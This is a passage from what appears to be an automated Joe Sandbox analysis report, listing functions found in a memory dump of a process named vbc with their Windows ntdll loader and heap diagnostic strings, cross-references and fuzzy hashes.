                                                                                    • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 058F29AC
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 058F292E
                                                                                    • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 058F2856
                                                                                    • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 058F29B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                    • API String ID: 0-541586583
                                                                                    • Opcode ID: 612a8d9bc7b204a22c4f60f099be7126f83ec318dec1391a5030a98411e71c59
                                                                                    • Instruction ID: fcf787f65acd6ac8a3dcabc7076e6f03f386a5cbbe93829cecc1ba31e110212e
                                                                                    • Opcode Fuzzy Hash: 612a8d9bc7b204a22c4f60f099be7126f83ec318dec1391a5030a98411e71c59
                                                                                    • Instruction Fuzzy Hash: 83C1B375A002299BEB209F19CC89BBAB7B9FF48714F0040D9ED49E7250EB749E81CF51
                                                                                    Function 05904DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpProtectedCopyMemory, xrefs: 05904DF4
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 05904EB1
                                                                                    • ***Exception thrown within loader***, xrefs: 05904E27
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 05904E06
                                                                                    • LdrpGenericExceptionFilter, xrefs: 05904DFC
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05904E38
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05904DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-2973941816
                                                                                    • Opcode ID: d91acae7fb17eb4b902dabd41ee71b68cc00a120a92693ecbb58c6119bd7c004
                                                                                    • Instruction ID: 7e28880101f88fadb8ca9c1b305cbcfcd18d52f5afa411a696f3046d36f170ca
                                                                                    • Opcode Fuzzy Hash: d91acae7fb17eb4b902dabd41ee71b68cc00a120a92693ecbb58c6119bd7c004
                                                                                    • Instruction Fuzzy Hash: 5B2168763442047FDB289A6C8C4DE367B9EFB82960F141D05FB27D76D1C960EE11D262
                                                                                    Function 0588ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                    • API String ID: 0-4098886588
                                                                                    • Opcode ID: 3a9e48e6e572851da3bf2e06489a1a39cfd8954f888b83983739192428843f5e
                                                                                    • Instruction ID: 1b4e3f9b94015b7999c1ec2c26d2b070add8825a8d80cde8e72265b1178491be
                                                                                    • Opcode Fuzzy Hash: 3a9e48e6e572851da3bf2e06489a1a39cfd8954f888b83983739192428843f5e
                                                                                    • Instruction Fuzzy Hash: EC329F75A042698BDB26DB14C898BFEB7B6FF85345F1440EADC49E7250DB31AE818F40
                                                                                    Function 058B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 938e470c557f0ae47e37bc9edc98c2be18ed97c4310826fffc0ca7d89387b70e
                                                                                    • Instruction ID: 44d04865cc51eea1c74f4de7b997172e8d9583f318037bab09862bae8e24d5f5
                                                                                    • Opcode Fuzzy Hash: 938e470c557f0ae47e37bc9edc98c2be18ed97c4310826fffc0ca7d89387b70e
                                                                                    • Instruction Fuzzy Hash: B6913B30B057189BEF25DF19D849BBE7BA5BB44724F04016AED02EB390EBB49C40D792
                                                                                    Function 058B2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 058B2E4D
                                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 058F279C
                                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 058F276F
                                                                                    • \WinSxS\, xrefs: 058B2E23
                                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 058F2706
                                                                                    • .Local\, xrefs: 058B2D91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                    • API String ID: 0-3926108909
                                                                                    • Opcode ID: d370b47886a1e2a3290ecb503b0656973d2ef2df541614a1b57d56fb957806dc
                                                                                    • Instruction ID: c38bc67f0d8f79d9c35a4e5b4c80ff95fcc9f8ad20248e1443ffcb652cb77563
                                                                                    • Opcode Fuzzy Hash: d370b47886a1e2a3290ecb503b0656973d2ef2df541614a1b57d56fb957806dc
                                                                                    • Instruction Fuzzy Hash: 8181CC752087459FEB11DF18C894AAAB7E9BF89714F04885DFC86CB341D6B4D904CBA2
                                                                                    Function 0587645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 058D9A2A
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058D99ED
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058D9A11, 058D9A3A
                                                                                    • LdrpInitShimEngine, xrefs: 058D99F4, 058D9A07, 058D9A30
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 058D9A01
                                                                                    • apphelp.dll, xrefs: 05876496
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: 8c0d170bc62cc28408be8e22af9a5ea55c6feaea3e1e2cef469df84be597c0ed
                                                                                    • Instruction ID: e513551e74c31530c681fdf5f914ba96c06003ae03e2a517475f1baf4d16a725
                                                                                    • Opcode Fuzzy Hash: 8c0d170bc62cc28408be8e22af9a5ea55c6feaea3e1e2cef469df84be597c0ed
                                                                                    • Instruction Fuzzy Hash: 035190713187089FD725DB24D845A6BB7E9FB84644F04091AFD86DB260EA34ED04DBA3
                                                                                    Function 058BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 058F81E5
                                                                                    • LdrpInitializeProcess, xrefs: 058BC6C4
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 058F8181, 058F81F5
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058BC6C3
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 058F8170
                                                                                    • LdrpInitializeImportRedirection, xrefs: 058F8177, 058F81EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: 7b904b074391be7a36ff9f0c448b7b5ab167feab803d1e1ccd873f7611b0f9db
                                                                                    • Instruction ID: fb2aaa9173cfd66b34efb5511528517ce9f437fc1a2b4cb0570ebae3e6817004
                                                                                    • Opcode Fuzzy Hash: 7b904b074391be7a36ff9f0c448b7b5ab167feab803d1e1ccd873f7611b0f9db
                                                                                    • Instruction Fuzzy Hash: 3A31D1727487059BD320EA28DC4AE6A77D9EF85B10F040958FD45EB390EA70EC04CBA3
                                                                                    Function 058B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 058F2178
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 058F2180
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 058F219F
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058F21BF
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 058F2160, 058F219A, 058F21BA
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058F2165
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: c5f2cad279fd16d0b199651aa67425f47ab7ee20945ee5a86d179a96ae72be9b
                                                                                    • Instruction ID: 14fbc45d44fdc33d4bbaebde436651cce5defba2745b9097faed61d3f3ab258c
                                                                                    • Opcode Fuzzy Hash: c5f2cad279fd16d0b199651aa67425f47ab7ee20945ee5a86d179a96ae72be9b
                                                                                    • Instruction Fuzzy Hash: 3531143AB402147AF721AA988C45F9E77ADEB99A44F054059FE06E7340D2B0AE41C7E9
                                                                                    Function 058C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 058C2DF0: LdrInitializeThunk.NTDLL ref: 058C2DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 058C0D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    • Opcode ID: 92e0cfbe96e7650d9c5b24ab4a7608c67d3eddbf26beebaa744ce662652f2db3
                                                                                    • Instruction ID: 1276a4117219cf225e89e721f9123ceaadec62a4017da0bbf42559a3df640a47
                                                                                    • Opcode Fuzzy Hash: 92e0cfbe96e7650d9c5b24ab4a7608c67d3eddbf26beebaa744ce662652f2db3
                                                                                    • Instruction Fuzzy Hash: 50422875A00715DFDB21CF28C884BAABBF5BF48314F1445A9E989DB241E770EA84CF61
                                                                                    Function 05904F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                    • API String ID: 0-2518169356
                                                                                    • Opcode ID: 9610ed78d9e86aedeaa243743bffb265fa868c83cda3e35ea5d3a7cab680b24d
                                                                                    • Instruction ID: 345e7122ee80ffcacfd660941355ad85e36d84a1f94c39375c23b7b2fbbac471
                                                                                    • Opcode Fuzzy Hash: 9610ed78d9e86aedeaa243743bffb265fa868c83cda3e35ea5d3a7cab680b24d
                                                                                    • Instruction Fuzzy Hash: 5291BE72A006199FCB21CF58C880ABEB7B9FF48310F5A5969E915EB390E775D901CB90
                                                                                    Function 0588A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 6edfef4920c00a8cdb9a6b750caded4081fa2e75abd585ac60f9834c67ea2c00
                                                                                    • Instruction ID: 41e3c9a496303dd91ab2f14940609462b683ed7eeb5c69b82c237dd926938b5f
                                                                                    • Opcode Fuzzy Hash: 6edfef4920c00a8cdb9a6b750caded4081fa2e75abd585ac60f9834c67ea2c00
                                                                                    • Instruction Fuzzy Hash: 76C17A742083868BC719EF58C044B7AB7E5FB85728F00486AFD96DB290E738DD49CB52
                                                                                    Function 058B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitializeProcess, xrefs: 058B8422
                                                                                    • @, xrefs: 058B8591
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 058B855E
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058B8421
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 09c09d339da255e18607adfc83de6766571c7aafa8971132bf94d44c9e00eb57
                                                                                    • Instruction ID: 437f56d25304c5f8531c765425f7eb17fdc964d3ce16d937052b24d70aba130c
                                                                                    • Opcode Fuzzy Hash: 09c09d339da255e18607adfc83de6766571c7aafa8971132bf94d44c9e00eb57
                                                                                    • Instruction Fuzzy Hash: 62915E71608344AFE721EB24C855FABBAEDBB84654F40092EFE85D2250E774DE44CB53
                                                                                    Function 05890C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • HEAP[%wZ]: , xrefs: 058E54D1, 058E5592
                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 058E55AE
                                                                                    • HEAP: , xrefs: 058E54E0, 058E55A1
                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 058E54ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                    • API String ID: 0-1657114761
                                                                                    • Opcode ID: 6064491c7648f3e63ab947f9677edfda5011fde6a67318ddfdaea348507f0c1a
                                                                                    • Instruction ID: 7ac844fa03f89a3f01fef0028cd4ab2dd8dcb6b17282c90cb7142bdad70d55b7
                                                                                    • Opcode Fuzzy Hash: 6064491c7648f3e63ab947f9677edfda5011fde6a67318ddfdaea348507f0c1a
                                                                                    • Instruction Fuzzy Hash: 70A1A074604649DBDB28CF28C848B7ABBF2BF45308F188569EC96CB641D734ED45CB91
                                                                                    Function 058B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058F22B6
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058F21D9, 058F22B1
                                                                                    • .Local, xrefs: 058B28D8
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 058F21DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 5a1371adaa2457b4f44d76a1a707945f4f8f422c0b06a747ddccb154d383c690
                                                                                    • Instruction ID: baf9f1cd9be4ce2f5cc8b9248c15e4e7b4ffccba2843a908e470069465bb1ed6
                                                                                    • Opcode Fuzzy Hash: 5a1371adaa2457b4f44d76a1a707945f4f8f422c0b06a747ddccb154d383c690
                                                                                    • Instruction Fuzzy Hash: 0BA17A39A042299BDB24DF64CC88BA9B3B5BF58314F1441EADD0AEB351D7709E81CF90
                                                                                    Function 058864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 058E1028
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 058E106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 058E0FE5
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058E10AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 58301a19e96f21c1e307b41b526545f404e2f42f781ec25e3f3a179cae4b9669
                                                                                    • Instruction ID: 7f13dc2fa0203f694a9e6b573a11510648a113a11da0e830f9351fd7bb873374
                                                                                    • Opcode Fuzzy Hash: 58301a19e96f21c1e307b41b526545f404e2f42f781ec25e3f3a179cae4b9669
                                                                                    • Instruction Fuzzy Hash: D87190B16043049FCB20EF19C889FA77BA9EF55754F440468FD49CB286E774D988CB92
                                                                                    Function 058B4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 058F365C
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 058F362F
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 058F3640, 058F366C
                                                                                    • LdrpFindDllActivationContext, xrefs: 058F3636, 058F3662
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 0-3779518884
                                                                                    • Opcode ID: 677ac3b881c4d2236fd38669c95e8d39a70eea43b9aaf5d8a01632259f2a67a6
                                                                                    • Instruction ID: 060711b7a34d4272e3cd40f4a8ca4b90174901a94eacd3ba40de5d642b0c358b
                                                                                    • Opcode Fuzzy Hash: 677ac3b881c4d2236fd38669c95e8d39a70eea43b9aaf5d8a01632259f2a67a6
                                                                                    • Instruction Fuzzy Hash: AC312532A14615AAEF31EB08C84BFB566AFBB01654F0E4026ED05D7373DBE0AC809791
                                                                                    Function 058A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 058EA992
                                                                                    • LdrpDynamicShimModule, xrefs: 058EA998
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 058EA9A2
                                                                                    • apphelp.dll, xrefs: 058A2462
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: ffd64aec821d8d6c5af76c14a8b1bfc3d0c292ea888f063cc2064e78ea868394
                                                                                    • Instruction ID: 419111e8b10011ff4ab09645de20adaca537c1c6c41e9dd75f08db7ed342eeef
                                                                                    • Opcode Fuzzy Hash: ffd64aec821d8d6c5af76c14a8b1bfc3d0c292ea888f063cc2064e78ea868394
                                                                                    • Instruction Fuzzy Hash: 26311332714305ABDB24AF68C84AEBA7BB6FB85B04F16005AFC11E7240DB745C41D780
                                                                                    Function 05890770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: e9e66db69cce554cd70c05da6ef6538623771c21ed88c13cf97a9d8dcc474edc
                                                                                    • Instruction ID: a3dc480aa93b94d5b7ae709c8071d66c0e29ff847bf60452c704ecc697e23799
                                                                                    • Opcode Fuzzy Hash: e9e66db69cce554cd70c05da6ef6538623771c21ed88c13cf97a9d8dcc474edc
                                                                                    • Instruction Fuzzy Hash: 2AF17A3470460AEFDB19CF68C898F6AB7B6FB45308F184169E816DB381D734AD81CB91
                                                                                    Function 0587A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 6d9dff4e75064a7b0e117c183038834b1f740bb0a9b292b164f2aa0589f37373
                                                                                    • Instruction ID: fe50d229da4c9ec7f796b3a250aeb113bdceba130484834d8cc4c7aeacb05e25
                                                                                    • Opcode Fuzzy Hash: 6d9dff4e75064a7b0e117c183038834b1f740bb0a9b292b164f2aa0589f37373
                                                                                    • Instruction Fuzzy Hash: ADA169759116289BDB219F68CC88BAAB7B9FF44710F0001EAED09E7250DB359EC4CF50
                                                                                    Function 0587CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 0587CD63
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0587CD34
                                                                                    • InstallLanguageFallback, xrefs: 0587CD7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                    • API String ID: 0-1757540487
